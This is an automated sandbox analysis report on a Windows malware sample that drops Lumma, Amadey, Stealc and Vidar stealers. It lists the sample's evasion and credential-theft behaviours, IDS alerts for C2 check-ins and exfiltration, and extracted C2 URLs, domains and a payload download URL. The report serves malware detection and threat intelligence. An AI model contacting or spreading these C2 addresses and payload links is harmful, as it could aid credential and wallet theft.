Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1542670
MD5: 8d1e04c056caf2cc26a48a16be0198b8
SHA1: f87723b046ab9db7acaa622516e3ba843650dce8
SHA256: 6b2b0c1fcb05eb6811e26b07df264a6a2becb83a95da2a875860c83e55776ff9
Tags: exe, user-Bitsight

Detection

LummaC, Amadey, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It appears to be one of the first stealers that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000007.00000003.2308287602.0000000004F40000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 26.2.b0b9f39429.exe.ba0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: 26.2.b0b9f39429.exe.ba0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: e192e43b61.exe.1340.11.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["crisiwarny.store", "scriptyprefej.store", "navygenerayk.store", "necklacedmny.store", "presticitpo.store", "thumbystriw.store", "fadehairucw.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}
Source: http://185.215.113.16/off/def.exe Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe ReversingLabs: Detection: 47%
Source: file.exe Virustotal: Detection: 42%
Source: file.exe ReversingLabs: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C66A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 6_2_6C66A9A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C664440 PK11_PrivDecrypt, 6_2_6C664440
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C634420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 6_2_6C634420
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6644C0 PK11_PubEncrypt, 6_2_6C6644C0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6B25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 6_2_6C6B25B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C648670 PK11_ExportEncryptedPrivKeyInfo, 6_2_6C648670
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C66A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 6_2_6C66A650
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C64E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 6_2_6C64E6E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C68A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 6_2_6C68A730
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C690180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 6_2_6C690180
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6643B0 PK11_PubEncryptPKCS1,PR_SetError, 6_2_6C6643B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C687C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 6_2_6C687C00
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C647D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 6_2_6C647D60
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C68BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 6_2_6C68BD30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C689EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 6_2_6C689EC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C663FF0 PK11_PrivDecryptPKCS1, 6_2_6C663FF0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C669840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 6_2_6C669840
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C663850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 6_2_6C663850
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: nss3.pdb@ source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: nss3.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447177544.0000000000192000.00000040.00000001.01000000.0000000B.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000003.2314064013.0000000004E40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: number of queries: 2130
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: firefox.exe Memory has grown: Private usage: 1MB later: 93MB

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49745
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49745
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49781 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49797
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49915 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50003 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50002 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50038 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50049 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50050 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49736 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49945 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49916 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49916 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49927 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49927 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49985 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49985 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49994 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49994 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50020 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50033 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50033 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50035 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50035 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50062 -> 104.21.95.91:443
